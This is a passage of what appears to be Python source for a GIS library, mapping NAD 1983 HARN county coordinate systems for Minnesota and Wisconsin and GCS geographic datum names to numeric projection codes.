'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Feet': 103745, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Feet': 103746, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Feet': 103747, 'NAD_1983_HARN_Adj_MN_Lincoln_Feet': 103748, 'NAD_1983_HARN_Adj_MN_Lyon_Feet': 103749, 'NAD_1983_HARN_Adj_MN_McLeod_Feet': 103750, 'NAD_1983_HARN_Adj_MN_Mahnomen_Feet': 103751, 'NAD_1983_HARN_Adj_MN_Marshall_Feet': 103752, 'NAD_1983_HARN_Adj_MN_Martin_Feet': 103753, 'NAD_1983_HARN_Adj_MN_Meeker_Feet': 103754, 'NAD_1983_HARN_Adj_MN_Morrison_Feet': 103755, 'NAD_1983_HARN_Adj_MN_Mower_Feet': 103756, 'NAD_1983_HARN_Adj_MN_Murray_Feet': 103757, 'NAD_1983_HARN_Adj_MN_Nicollet_Feet': 103758, 'NAD_1983_HARN_Adj_MN_Nobles_Feet': 103759, 'NAD_1983_HARN_Adj_MN_Norman_Feet': 103760, 'NAD_1983_HARN_Adj_MN_Olmsted_Feet': 103761, 'NAD_1983_HARN_Adj_MN_Ottertail_Feet': 103762, 'NAD_1983_HARN_Adj_MN_Pennington_Feet': 103763, 'NAD_1983_HARN_Adj_MN_Pine_Feet': 103764, 'NAD_1983_HARN_Adj_MN_Pipestone_Feet': 103765, 'NAD_1983_HARN_Adj_MN_Polk_Feet': 103766, 'NAD_1983_HARN_Adj_MN_Pope_Feet': 103767, 'NAD_1983_HARN_Adj_MN_Ramsey_Feet': 103768, 'NAD_1983_HARN_Adj_MN_Red_Lake_Feet': 103769, 'NAD_1983_HARN_Adj_MN_Redwood_Feet': 103770, 'NAD_1983_HARN_Adj_MN_Renville_Feet': 103771, 'NAD_1983_HARN_Adj_MN_Rice_Feet': 103772, 'NAD_1983_HARN_Adj_MN_Rock_Feet': 103773, 'NAD_1983_HARN_Adj_MN_Roseau_Feet': 103774, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Feet': 103775, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Feet': 103776, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Feet': 103777, 'NAD_1983_HARN_Adj_MN_Scott_Feet': 103778, 'NAD_1983_HARN_Adj_MN_Sherburne_Feet': 103779, 'NAD_1983_HARN_Adj_MN_Sibley_Feet': 103780, 'NAD_1983_HARN_Adj_MN_Stearns_Feet': 103781, 'NAD_1983_HARN_Adj_MN_Steele_Feet': 103782, 'NAD_1983_HARN_Adj_MN_Stevens_Feet': 103783, 'NAD_1983_HARN_Adj_MN_Swift_Feet': 103784, 'NAD_1983_HARN_Adj_MN_Todd_Feet': 103785, 'NAD_1983_HARN_Adj_MN_Traverse_Feet': 103786, 'NAD_1983_HARN_Adj_MN_Wabasha_Feet': 103787, 
'NAD_1983_HARN_Adj_MN_Wadena_Feet': 103788, 'NAD_1983_HARN_Adj_MN_Waseca_Feet': 103789, 'NAD_1983_HARN_Adj_MN_Watonwan_Feet': 103790, 'NAD_1983_HARN_Adj_MN_Winona_Feet': 103791, 'NAD_1983_HARN_Adj_MN_Wright_Feet': 103792, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Feet': 103793, 'NAD_1983_HARN_Adj_WI_Adams_Meters': 103800, 'NAD_1983_HARN_Adj_WI_Ashland_Meters': 103801, 'NAD_1983_HARN_Adj_WI_Barron_Meters': 103802, 'NAD_1983_HARN_Adj_WI_Brown_Meters': 103803, 'NAD_1983_HARN_Adj_WI_Buffalo_Meters': 103804, 'NAD_1983_HARN_Adj_WI_Calumet_Meters': 103805, 'NAD_1983_HARN_Adj_WI_Clark_Meters': 103806, 'NAD_1983_HARN_Adj_WI_Dodge_Meters': 103807, 'NAD_1983_HARN_Adj_WI_Door_Meters': 103808, 'NAD_1983_HARN_Adj_WI_Douglas_Meters': 103809, 'NAD_1983_HARN_Adj_WI_Dunn_Meters': 103810, 'NAD_1983_HARN_Adj_WI_Florence_Meters': 103811, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Meters': 103812, 'NAD_1983_HARN_Adj_WI_Forest_Meters': 103813, 'NAD_1983_HARN_Adj_WI_Grant_Meters': 103814, 'NAD_1983_HARN_Adj_WI_Iowa_Meters': 103815, 'NAD_1983_HARN_Adj_WI_Iron_Meters': 103816, 'NAD_1983_HARN_Adj_WI_Jefferson_Meters': 103817, 'NAD_1983_HARN_Adj_WI_Juneau_Meters': 103818, 'NAD_1983_HARN_Adj_WI_Kenosha_Meters': 103819, 'NAD_1983_HARN_Adj_WI_Kewaunee_Meters': 103820, 'NAD_1983_HARN_Adj_WI_LaCrosse_Meters': 103821, 'NAD_1983_HARN_Adj_WI_Lincoln_Meters': 103822, 'NAD_1983_HARN_Adj_WI_Manitowoc_Meters': 103823, 'NAD_1983_HARN_Adj_WI_Marinette_Meters': 103824, 'NAD_1983_HARN_Adj_WI_Menominee_Meters': 103825, 'NAD_1983_HARN_Adj_WI_Milwaukee_Meters': 103826, 'NAD_1983_HARN_Adj_WI_Oconto_Meters': 103827, 'NAD_1983_HARN_Adj_WI_Outagamie_Meters': 103828, 'NAD_1983_HARN_Adj_WI_Ozaukee_Meters': 103829, 'NAD_1983_HARN_Adj_WI_Polk_Meters': 103830, 'NAD_1983_HARN_Adj_WI_Price_Meters': 103831, 'NAD_1983_HARN_Adj_WI_Racine_Meters': 103832, 'NAD_1983_HARN_Adj_WI_Rock_Meters': 103833, 'NAD_1983_HARN_Adj_WI_Rusk_Meters': 103834, 'NAD_1983_HARN_Adj_WI_St_Croix_Meters': 103835, 'NAD_1983_HARN_Adj_WI_Sauk_Meters': 103836, 
'NAD_1983_HARN_Adj_WI_Shawano_Meters': 103837, 'NAD_1983_HARN_Adj_WI_Sheboygan_Meters': 103838, 'NAD_1983_HARN_Adj_WI_Trempealeau_Meters': 103839, 'NAD_1983_HARN_Adj_WI_Washington_Meters': 103840, 'NAD_1983_HARN_Adj_WI_Waukesha_Meters': 103841, 'NAD_1983_HARN_Adj_WI_Waupaca_Meters': 103842, 'NAD_1983_HARN_Adj_WI_Winnebago_Meters': 103843, 'NAD_1983_HARN_Adj_WI_Bayfield_Meters': 103844, 'NAD_1983_HARN_Adj_WI_Burnett_Meters': 103845, 'NAD_1983_HARN_Adj_WI_Chippewa_Meters': 103846, 'NAD_1983_HARN_Adj_WI_Columbia_Meters': 103847, 'NAD_1983_HARN_Adj_WI_Crawford_Meters': 103848, 'NAD_1983_HARN_Adj_WI_Dane_Meters': 103849, 'NAD_1983_HARN_Adj_WI_EauClaire_Meters': 103850, 'NAD_1983_HARN_Adj_WI_Green_Meters': 103851, 'NAD_1983_HARN_Adj_WI_GreenLake_Meters': 103852, 'NAD_1983_HARN_Adj_WI_Jackson_Meters': 103853, 'NAD_1983_HARN_Adj_WI_Lafayette_Meters': 103854, 'NAD_1983_HARN_Adj_WI_Langlade_Meters': 103855, 'NAD_1983_HARN_Adj_WI_Marathon_Meters': 103856, 'NAD_1983_HARN_Adj_WI_Marquette_Meters': 103857, 'NAD_1983_HARN_Adj_WI_Monroe_Meters': 103858, 'NAD_1983_HARN_Adj_WI_Oneida_Meters': 103859, 'NAD_1983_HARN_Adj_WI_Pepin_Meters': 103860, 'NAD_1983_HARN_Adj_WI_Pierce_Meters': 103861, 'NAD_1983_HARN_Adj_WI_Portage_Meters': 103862, 'NAD_1983_HARN_Adj_WI_Richland_Meters': 103863, 'NAD_1983_HARN_Adj_WI_Sawyer_Meters': 103864, 'NAD_1983_HARN_Adj_WI_Taylor_Meters': 103865, 'NAD_1983_HARN_Adj_WI_Vernon_Meters': 103866, 'NAD_1983_HARN_Adj_WI_Vilas_Meters': 103867, 'NAD_1983_HARN_Adj_WI_Walworth_Meters': 103868, 'NAD_1983_HARN_Adj_WI_Washburn_Meters': 103869, 'NAD_1983_HARN_Adj_WI_Waushara_Meters': 103870, 'NAD_1983_HARN_Adj_WI_Wood_Meters': 103871, 'NAD_1983_HARN_Adj_WI_Adams_Feet': 103900, 'NAD_1983_HARN_Adj_WI_Ashland_Feet': 103901, 'NAD_1983_HARN_Adj_WI_Barron_Feet': 103902, 'NAD_1983_HARN_Adj_WI_Brown_Feet': 103903, 'NAD_1983_HARN_Adj_WI_Buffalo_Feet': 103904, 'NAD_1983_HARN_Adj_WI_Calumet_Feet': 103905, 'NAD_1983_HARN_Adj_WI_Clark_Feet': 103906, 'NAD_1983_HARN_Adj_WI_Dodge_Feet': 
103907, 'NAD_1983_HARN_Adj_WI_Door_Feet': 103908, 'NAD_1983_HARN_Adj_WI_Douglas_Feet': 103909, 'NAD_1983_HARN_Adj_WI_Dunn_Feet': 103910, 'NAD_1983_HARN_Adj_WI_Florence_Feet': 103911, 'NAD_1983_HARN_Adj_WI_Fond_du_Lac_Feet': 103912, 'NAD_1983_HARN_Adj_WI_Forest_Feet': 103913, 'NAD_1983_HARN_Adj_WI_Grant_Feet': 103914, 'NAD_1983_HARN_Adj_WI_Iowa_Feet': 103915, 'NAD_1983_HARN_Adj_WI_Iron_Feet': 103916, 'NAD_1983_HARN_Adj_WI_Jefferson_Feet': 103917, 'NAD_1983_HARN_Adj_WI_Juneau_Feet': 103918, 'NAD_1983_HARN_Adj_WI_Kenosha_Feet': 103919, 'NAD_1983_HARN_Adj_WI_Kewaunee_Feet': 103920, 'NAD_1983_HARN_Adj_WI_LaCrosse_Feet': 103921, 'NAD_1983_HARN_Adj_WI_Lincoln_Feet': 103922, 'NAD_1983_HARN_Adj_WI_Manitowoc_Feet': 103923, 'NAD_1983_HARN_Adj_WI_Marinette_Feet': 103924, 'NAD_1983_HARN_Adj_WI_Menominee_Feet': 103925, 'NAD_1983_HARN_Adj_WI_Milwaukee_Feet': 103926, 'NAD_1983_HARN_Adj_WI_Oconto_Feet': 103927, 'NAD_1983_HARN_Adj_WI_Outagamie_Feet': 103928, 'NAD_1983_HARN_Adj_WI_Ozaukee_Feet': 103929, 'NAD_1983_HARN_Adj_WI_Polk_Feet': 103930, 'NAD_1983_HARN_Adj_WI_Price_Feet': 103931, 'NAD_1983_HARN_Adj_WI_Racine_Feet': 103932, 'NAD_1983_HARN_Adj_WI_Rock_Feet': 103933, 'NAD_1983_HARN_Adj_WI_Rusk_Feet': 103934, 'NAD_1983_HARN_Adj_WI_St_Croix_Feet': 103935, 'NAD_1983_HARN_Adj_WI_Sauk_Feet': 103936, 'NAD_1983_HARN_Adj_WI_Shawano_Feet': 103937, 'NAD_1983_HARN_Adj_WI_Sheboygan_Feet': 103938, 'NAD_1983_HARN_Adj_WI_Trempealeau_Feet': 103939, 'NAD_1983_HARN_Adj_WI_Washington_Feet': 103940, 'NAD_1983_HARN_Adj_WI_Waukesha_Feet': 103941, 'NAD_1983_HARN_Adj_WI_Waupaca_Feet': 103942, 'NAD_1983_HARN_Adj_WI_Winnebago_Feet': 103943, 'NAD_1983_HARN_Adj_WI_Bayfield_Feet': 103944, 'NAD_1983_HARN_Adj_WI_Burnett_Feet': 103945, 'NAD_1983_HARN_Adj_WI_Chippewa_Feet': 103946, 'NAD_1983_HARN_Adj_WI_Columbia_Feet': 103947, 'NAD_1983_HARN_Adj_WI_Crawford_Feet': 103948, 'NAD_1983_HARN_Adj_WI_Dane_Feet': 103949, 'NAD_1983_HARN_Adj_WI_EauClaire_Feet': 103950, 'NAD_1983_HARN_Adj_WI_Green_Feet': 103951, 
'NAD_1983_HARN_Adj_WI_GreenLake_Feet': 103952, 'NAD_1983_HARN_Adj_WI_Jackson_Feet': 103953, 'NAD_1983_HARN_Adj_WI_Lafayette_Feet': 103954, 'NAD_1983_HARN_Adj_WI_Langlade_Feet': 103955, 'NAD_1983_HARN_Adj_WI_Marathon_Feet': 103956, 'NAD_1983_HARN_Adj_WI_Marquette_Feet': 103957, 'NAD_1983_HARN_Adj_WI_Monroe_Feet': 103958, 'NAD_1983_HARN_Adj_WI_Oneida_Feet': 103959, 'NAD_1983_HARN_Adj_WI_Pepin_Feet': 103960, 'NAD_1983_HARN_Adj_WI_Pierce_Feet': 103961, 'NAD_1983_HARN_Adj_WI_Portage_Feet': 103962, 'NAD_1983_HARN_Adj_WI_Richland_Feet': 103963, 'NAD_1983_HARN_Adj_WI_Sawyer_Feet': 103964, 'NAD_1983_HARN_Adj_WI_Taylor_Feet': 103965, 'NAD_1983_HARN_Adj_WI_Vernon_Feet': 103966, 'NAD_1983_HARN_Adj_WI_Vilas_Feet': 103967, 'NAD_1983_HARN_Adj_WI_Walworth_Feet': 103968, 'NAD_1983_HARN_Adj_WI_Washburn_Feet': 103969, 'NAD_1983_HARN_Adj_WI_Waushara_Feet': 103970, 'NAD_1983_HARN_Adj_WI_Wood_Feet': 103971 } class geographic(Projection): _projections = { 'GCS_Airy_1830': 4001, 'GCS_Airy_Modified': 4002, 'GCS_Australian': 4003, 'GCS_Bessel_1841': 4004, 'GCS_Bessel_Modified': 4005, 'GCS_Bessel_Namibia': 4006, 'GCS_Clarke_1858': 4007, 'GCS_Clarke_1866': 4008, 'GCS_Clarke_1866_Michigan': 4009, 'GCS_Clarke_1880_Benoit': 4010, 'GCS_Clarke_1880_IGN': 4011, 'GCS_Clarke_1880_RGS': 4012, 'GCS_Clarke_1880_Arc': 4013, 'GCS_Clarke_1880_SGA': 4014, 'GCS_Everest_Adj_1937': 4015, 'GCS_Everest_def_1967': 4016, 'GCS_Everest_Modified': 4018, 'GCS_GRS_1980': 4019, 'GCS_Helmert_1906': 4020, 'GCS_Indonesian': 4021, 'GCS_International_1924': 4022, 'GCS_International_1967': 4023, 'GCS_Krasovsky_1940': 4024, 'GCS_NWL_9D': 4025, 'GCS_Plessis_1817': 4027, 'GCS_Struve_1860': 4028, 'GCS_War_Office': 4029, 'GCS_GEM_10C': 4031, 'GCS_OSU_86F': 4032, 'GCS_OSU_91A': 4033, 'GCS_Clarke_1880': 4034, 'GCS_Sphere': 4035, 'GCS_GRS_1967': 4036, 'GCS_Everest_1830': 4042, 'GCS_Everest_def_1962': 4044, 'GCS_Everest_def_1975': 4045, 'GCS_Sphere_GRS_1980_Authalic': 4047, 'GCS_Sphere_Clarke_1866_Authalic': 4052, 
'GCS_Sphere_International_1924_Authalic': 4053, 'GCS_Hughes_1980': 4054, 'GCS_Greek': 4120, 'GCS_GGRS_1987': 4121, 'GCS_ATS_1977': 4122, 'GCS_KKJ': 4123, 'GCS_RT_1990': 4124, 'GCS_Samboja': 4125, 'GCS_LKS_1994': 4126, 'GCS_Tete': 4127, 'GCS_Madzansua': 4128, 'GCS_Observatario': 4129, 'GCS_Moznet': 4130, 'GCS_Indian_1960': 4131, 'GCS_FD_1958': 4132, 'GCS_Estonia_1992': 4133, 'GCS_PDO_1993': 4134, 'GCS_Old_Hawaiian': 4135, 'GCS_St_Lawrence_Island': 4136, 'GCS_St_Paul_Island': 4137, 'GCS_St_George_Island': 4138, 'GCS_Puerto_Rico': 4139, 'GCS_North_American_1983_CSRS': 4140, 'GCS_Israel': 4141, 'GCS_Locodjo_1965': 4142, 'GCS_Abidjan_1987': 4143, 'GCS_Kalianpur_1937': 4144, 'GCS_Kalianpur_1962': 4145, 'GCS_Kalianpur_1975': 4146, 'GCS_Hanoi_1972': 4147, 'GCS_Hartebeesthoek_1994': 4148, 'GCS_CH1903': 4149, 'GCS_CH1903+': 4150, 'GCS_Swiss_TRF_1995': 4151, 'GCS_North_American_1983_HARN': 4152, 'GCS_Rassadiran': 4153, 'GCS_European_1950_ED77': 4154, 'GCS_Dabola_1981': 4155, 'GCS_S_JTSK': 4156, 'GCS_Mount_Dillon': 4157, 'GCS_Naparima_1955': 4158, 'GCS_European_Libyan_Datum_1979': 4159, 'GCS_Chos_Malal_1914': 4160, 'GCS_Pampa_del_Castillo': 4161, 'GCS_Korean_Datum_1985': 4162, 'GCS_Yemen_NGN_1996': 4163, 'GCS_South_Yemen': 4164, 'GCS_Bissau': 4165, 'GCS_Korean_Datum_1995': 4166, 'GCS_NZGD_2000': 4167, 'GCS_Accra': 4168, 'GCS_American_Samoa_1962': 4169, 'GCS_SIRGAS': 4170, 'GCS_RGF_1993': 4171, 'GCS_POSGAR': 4172, 'GCS_IRENET95': 4173, 'GCS_Sierra_Leone_1924': 4174, 'GCS_Sierra_Leone_1968': 4175, 'GCS_Australian_Antarctic_1998': 4176, 'GCS_Pulkovo_1942_Adj_1983': 4178, 'GCS_Pulkovo_1942_Adj_1958': 4179, 'GCS_Estonia_1997': 4180, 'GCS_Luxembourg_1930': 4181, 'GCS_Azores_Occidental_1939': 4182, 'GCS_Azores_Central_1948': 4183, 'GCS_Azores_Oriental_1940': 4184, 'GCS_Madeira_1936': 4185, 'GCS_OSNI_1952': 4188, 'GCS_REGVEN': 4189, 'GCS_POSGAR_1998': 4190, 'GCS_Albanian_1987': 4191, 'GCS_Douala_1948': 4192, 'GCS_Manoca_1962': 4193, 'GCS_Qornoq_1927': 4194, 'GCS_Scoresbysund_1952': 
4195, 'GCS_Ammassalik_1958': 4196, 'GCS_Kousseri': 4198, 'GCS_Egypt_1930': 4199, 'GCS_Pulkovo_1995': 4200, 'GCS_Adindan': 4201, 'GCS_Australian_1966': 4202, 'GCS_Australian_1984': 4203, 'GCS_Ain_el_Abd_1970': 4204, 'GCS_Afgooye': 4205, 'GCS_Agadez': 4206, 'GCS_Lisbon': 4207, 'GCS_Aratu': 4208, 'GCS_Arc_1950': 4209, 'GCS_Arc_1960': 4210, 'GCS_Batavia': 4211, 'GCS_Barbados_1938': 4212, 'GCS_Beduaram': 4213, 'GCS_Beijing_1954': 4214, 'GCS_Belge_1950': 4215, 'GCS_Bermuda_1957': 4216, 'GCS_Bern_1898': 4217, 'GCS_Bogota': 4218, 'GCS_Bukit_Rimpah': 4219, 'GCS_Camacupa': 4220, 'GCS_Campo_Inchauspe': 4221, 'GCS_Cape': 4222, 'GCS_Carthage': 4223, 'GCS_Chua': 4224, 'GCS_Corrego_Alegre': 4225, 'GCS_Cote_d_Ivoire': 4226, 'GCS_Deir_ez_Zor': 4227, 'GCS_Douala': 4228, 'GCS_Egypt_1907': 4229, 'GCS_European_1950': 4230, 'GCS_European_1987': 4231, 'GCS_Fahud': 4232, 'GCS_Gandajika_1970': 4233, 'GCS_Garoua': 4234, 'GCS_Guyane_Francaise': 4235, 'GCS_Hu_Tzu_Shan': 4236, 'GCS_Hungarian_1972': 4237, 'GCS_Indonesian_1974': 4238, 'GCS_Indian_1954': 4239, 'GCS_Indian_1975': 4240, 'GCS_Jamaica_1875': 4241, 'GCS_Jamaica_1969': 4242, 'GCS_Kalianpur_1880': 4243, 'GCS_Kandawala': 4244, 'GCS_Kertau': 4245, 'GCS_Kuwait_Oil_Company': 4246, 'GCS_La_Canoa': 4247, 'GCS_Provisional_S_American_1956': 4248, 'GCS_Lake': 4249, 'GCS_Leigon': 4250, 'GCS_Liberia_1964': 4251, 'GCS_Lome': 4252, 'GCS_Luzon_1911': 4253, 'GCS_Hito_XVIII_1963': 4254, 'GCS_Herat_North': 4255, 'GCS_Mahe_1971': 4256, 'GCS_Makassar': 4257, 'GCS_ETRS_1989': 4258, 'GCS_Malongo_1987': 4259, 'GCS_Manoca': 4260, 'GCS_Merchich': 4261, 'GCS_Massawa': 4262, 'GCS_Minna': 4263, 'GCS_Mhast': 4264, 'GCS_Monte_Mario': 4265, 'GCS_Mporaloko': 4266, 'GCS_North_American_1927': 4267, 'GCS_North_American_Michigan': 4268, 'GCS_North_American_1983': 4269, 'GCS_Nahrwan_1967': 4270, 'GCS_Naparima_1972': 4271, 'GCS_New_Zealand_1949': 4272, 'GCS_NGO_1948': 4273, 'GCS_Datum_73': 4274, 'GCS_NTF': 4275, 'GCS_NSWC_9Z_2': 4276, 'GCS_OSGB_1936': 4277, 
'GCS_OSGB_1970_SN': 4278, 'GCS_OS_SN_1980': 4279, 'GCS_Padang_1884': 4280, 'GCS_Palestine_1923': 4281, 'GCS_Pointe_Noire': 4282, 'GCS_GDA_1994': 4283, 'GCS_Pulkovo_1942': 4284, 'GCS_Qatar_1974': 4285, 'GCS_Qatar_1948': 4286, 'GCS_Qornoq': 4287, 'GCS_Loma_Quintana': 4288, 'GCS_Amersfoort': 4289, 'GCS_South_American_1969': 4291, 'GCS_Sapper_Hill_1943': 4292, 'GCS_Schwarzeck': 4293, 'GCS_Segora': 4294, 'GCS_Serindung': 4295, 'GCS_Sudan': 4296, 'GCS_Tananarive_1925': 4297, 'GCS_Timbalai_1948': 4298, 'GCS_TM65': 4299, 'GCS_TM75': 4300, 'GCS_Tokyo': 4301, 'GCS_Trinidad_1903': 4302, 'GCS_Trucial_Coast_1948': 4303, 'GCS_Voirol_1875': 4304, 'GCS_Voirol_Unifie_1960': 4305, 'GCS_Bern_1938': 4306, 'GCS_Nord_Sahara_1959': 4307, 'GCS_RT38': 4308, 'GCS_Yacare': 4309, 'GCS_Yoff': 4310, 'GCS_Zanderij': 4311, 'GCS_MGI': 4312, 'GCS_Belge_1972': 4313, 'GCS_Deutsches_Hauptdreiecksnetz': 4314, 'GCS_Conakry_1905': 4315, 'GCS_Dealul_Piscului_1933': 4316, 'GCS_Dealul_Piscului_1970': 4317, 'GCS_NGN': 4318, 'GCS_KUDAMS': 4319, 'GCS_WGS_1972': 4322, 'GCS_WGS_1972_BE': 4324, 'GCS_WGS_1984': 4326, 'GCS_Montserrat_1958': 4404, 'GCS_Anguilla_1957': 4600, 'GCS_Antigua_1943': 4601, 'GCS_Dominica_1945': 4602, 'GCS_Grenada_1953': 4603, 'GCS_St_Kitts_1955': 4605, 'GCS_St_Lucia_1955': 4606, 'GCS_St_Vincent_1945': 4607, 'GCS_NAD_1927_Definition_1976': 4608, 'GCS_NAD_1927_CGQ77': 4609, 'GCS_Xian_1980': 4610, 'GCS_Hong_Kong_1980': 4611, 'GCS_JGD_2000': 4612, 'GCS_Gunung_Segara': 4613, 'GCS_QND_1995': 4614, 'GCS_Porto_Santo_1936': 4615, 'GCS_Selvagem_Grande_1938': 4616, 'GCS_North_American_1983_CSRS': 4617, 'GCS_South_American_1969': 4618, 'GCS_SWEREF99': 4619, 'GCS_Point_58': 4620, 'GCS_Fort_Marigot': 4621, 'GCS_Sainte_Anne': 4622, 'GCS_CSG_1967': 4623, 'GCS_RGFG_1995': 4624, 'GCS_Fort_Desaix': 4625, 'GCS_Reunion_1947': 4626, 'GCS_RGR_1992': 4627, 'GCS_Tahiti_1952': 4628, 'GCS_Tahaa_1954': 4629, 'GCS_IGN72_Nuku_Hiva': 4630, 'GCS_K0_1949': 4631, 'GCS_Combani_1950': 4632, 'GCS_IGN56_Lifou': 4633, 
'GCS_Petrels_1972': 4636, 'GCS_Pointe_Geologie_Perroud_1950': 4637, 'GCS_Saint_Pierre_et_Miquelon_1950': 4638, 'GCS_MOP78': 4639, 'GCS_RRAF_1991': 4640, 'GCS_IGN53_Mare': 4641, 'GCS_ST84_Ile_des_Pins': 4642, 'GCS_ST71_Belep': 4643, 'GCS_NEA74_Noumea': 4644, 'GCS_RGNC_1991': 4645, 'GCS_Grand_Comoros': 4646, 'GCS_Reykjavik_1900': 4657, 'GCS_Hjorsey_1955': 4658, 'GCS_ISN_1993': 4659, 'GCS_Helle_1954': 4660, 'GCS_LKS_1992': 4661, 'GCS_IGN72_Grande_Terre': 4662, 'GCS_Porto_Santo_1995': 4663, 'GCS_Azores_Oriental_1995': 4664, 'GCS_Azores_Central_1995': 4665, 'GCS_Lisbon_1890': 4666, 'GCS_IKBD_1992': 4667, 'GCS_European_1979': 4668, 'GCS_LKS_1994': 4669, 'GCS_IGM_1995': 4670, 'GCS_Voirol_1879': 4671, 'GCS_Chatham_Island_1971': 4672, 'GCS_Chatham_Islands_1979': 4673, 'GCS_SIRGAS_2000': 4674, 'GCS_Guam_1963': 4675, 'GCS_Vientiane_1982': 4676, 'GCS_Lao_1993': 4677, 'GCS_Lao_1997': 4678, 'GCS_Jouik_1961': 4679, 'GCS_Nouakchott_1965': 4680, 'GCS_Gulshan_303': 4682, 'GCS_PRS_1992': 4683, 'GCS_Gan_1970': 4684, 'GCS_MAGNA': 4686, 'GCS_RGPF': 4687, 'GCS_Fatu_Iva_1972': 4688, 'GCS_IGN63_Hiva_Oa': 4689, 'GCS_Tahiti_1979': 4690, 'GCS_Moorea_1987': 4691, 'GCS_Maupiti_1983': 4692, 'GCS_Nakhl-e_Ghanem': 4693, 'GCS_POSGAR_1994': 4694, 'GCS_Katanga_1955': 4695, 'GCS_Kasai_1955': 4696, 'GCS_IGC_1962_6th_Parallel_South': 4697, 'GCS_Kerguelen_Island_1949': 4698, 'GCS_Le_Pouce_1934': 4699, 'GCS_IGN_Astro_1960': 4700, 'GCS_IGCB_1955': 4701, 'GCS_Mauritania_1999': 4702, 'GCS_Mhast_1951': 4703, 'GCS_Mhast_Onshore': 4704, 'GCS_Mhast_Offshore': 4705, 'GCS_Egypt_Gulf_of_Suez_S-650_TL': 4706, 'GCS_Tern_Island_1961': 4707, 'GCS_Anna_1_1965': 4708, 'GCS_Beacon_E_1945': 4709, 'GCS_DOS_71_4': 4710, 'GCS_Astro_1952': 4711, 'GCS_Ascension_Island_1958': 4712, 'GCS_Ayabelle': 4713, 'GCS_Bellevue_IGN': 4714, 'GCS_Camp_Area': 4715, 'GCS_Canton_1966': 4716, 'GCS_Cape_Canaveral': 4717, 'GCS_Solomon_1968': 4718, 'GCS_Easter_Island_1967': 4719, 'GCS_Fiji_1986': 4720, 'GCS_Fiji_1956': 4721, 'GCS_ISTS_061_1968': 
4722, 'GCS_Grand_Cayman_1959': 4723, 'GCS_ISTS_073_1969': 4724, 'GCS_Johnston_Island_1961': 4725, 'GCS_Little_Cayman_1961': 4726, 'GCS_Midway_1961': 4727, 'GCS_Pico_de_Las_Nieves': 4728, 'GCS_Pitcairn_1967': 4729, 'GCS_Santo_DOS_1965': 4730, 'GCS_Viti_Levu_1916': 4731, 'GCS_Wake_Eniwetok_1960': 4732, 'GCS_Wake_Island_1952': 4733, 'GCS_Tristan_1968': 4734, 'GCS_Kusaie_1951': 4735, 'GCS_Deception_Island': 4736, 'GCS_Korea_2000': 4737, 'GCS_Hong_Kong_1963': 4738, 'GCS_Hong_Kong_1963_67': 4739, 'GCS_PZ_1990': 4740, 'GCS_FD_1954': 4741, 'GCS_GDM_2000': 4742, 'GCS_Karbala_1979_Polservice': 4743, 'GCS_Nahrwan_1934': 4744, 'GCS_RD/83': 4745, 'GCS_PD/83': 4746, 'GCS_Greenland_1996': 4747, 'GCS_Vanua_Levu_1915': 4748, 'GCS_RGNC_1991-93': 4749, 'GCS_ST87_Ouvea': 4750, 'GCS_fk89': 4753, 'GCS_LGD2006': 4754, 'GCS_DGN_1995': 4755, 'GCS_VN_2000': 4756, 'GCS_SVY21': 4757, 'GCS_JAD_2001': 4758, 'GCS_NAD_1983_NSRS2007': 4759, 'GCS_WGS_1966': 4760, 'GCS_Bern_1898_Bern': 4801, 'GCS_Bogota_Bogota': 4802, 'GCS_Lisbon_Lisbon': 4803, 'GCS_Makassar_Jakarta': 4804, 'GCS_MGI_Ferro': 4805, 'GCS_Monte_Mario_Rome': 4806, 'GCS_NTF_Paris': 4807, 'GCS_Padang_1884_Jakarta': 4808, 'GCS_Belge_1950_Brussels': 4809, 'GCS_Tananarive_1925_Paris': 4810, 'GCS_Voirol_1875_Paris': 4811, 'GCS_Voirol_Unifie_1960_Paris': 4812, 'GCS_Batavia_Jakarta': 4813, 'GCS_RT38_Stockholm': 4814, 'GCS_Greek_Athens': 4815, 'GCS_Carthage_Paris': 4816, 'GCS_NGO_1948_Oslo': 4817, 'GCS_S_JTSK_Ferro': 4818, 'GCS_Nord_Sahara_1959_Paris': 4819, 'GCS_Gunung_Segara_Jakarta': 4820, 'GCS_Voirol_1879_Paris': 4821, 'GCS_ITRF_2005': 4896, 'GCS_ATF_Paris': 4901, 'GCS_Nord_de_Guerre_Paris': 4902, 'GCS_Madrid_1870_Madrid': 4903, 'GCS_Lisbon_1890_Lisbon': 4904, 'GCS_WGS_1966': 37001, 'GCS_Fischer_1960': 37002, 'GCS_Fischer_1968': 37003, 'GCS_Fischer_Modified': 37004, 'GCS_Hough_1960': 37005, 'GCS_Everest_Modified_1969': 37006, 'GCS_Walbeck': 37007, 'GCS_Sphere_ARC_INFO': 37008, 'GCS_European_1979': 37201, 'GCS_Everest_Bangladesh': 37202, 
'GCS_Everest_India_Nepal': 37203, 'GCS_Hjorsey_1955': 37204, 'GCS_Hong_Kong_1963_67': 37205, 'GCS_Oman': 37206, 'GCS_South_Asia_Singapore': 37207, 'GCS_Ayabelle': 37208, 'GCS_Point_58': 37211, 'GCS_Beacon_E_1945': 37212, 'GCS_Tern_Island_1961': 37213, 'GCS_Astro_1952': 37214, 'GCS_Bellevue_IGN': 37215, 'GCS_Canton_1966': 37216, 'GCS_Chatham_Island_1971': 37217, 'GCS_DOS_1968': 37218, 'GCS_Easter_Island_1967': 37219, 'GCS_Guam_1963': 37220, 'GCS_GUX_1': 37221, 'GCS_Johnston_Island_1961': 37222, 'GCS_Carthage_Degree': 37223, 'GCS_Midway_1961': 37224, 'GCS_Pitcairn_1967': 37226, 'GCS_Santo_DOS_1965': 37227, 'GCS_Viti_Levu_1916': 37228, 'GCS_Wake_Eniwetok_1960': 37229, 'GCS_Wake_Island_1952': 37230, 'GCS_Anna_1_1965': 37231, 'GCS_Gan_1970': 37232, 'GCS_ISTS_073_1969': 37233, 'GCS_Kerguelen_Island_1949': 37234, 'GCS_Reunion_1947': 37235, 'GCS_Ascension_Island_1958': 37237, 'GCS_DOS_71_4': 37238, 'GCS_Cape_Canaveral': 37239, 'GCS_Fort_Thomas_1955': 37240, 'GCS_Graciosa_Base_SW_1948': 37241, 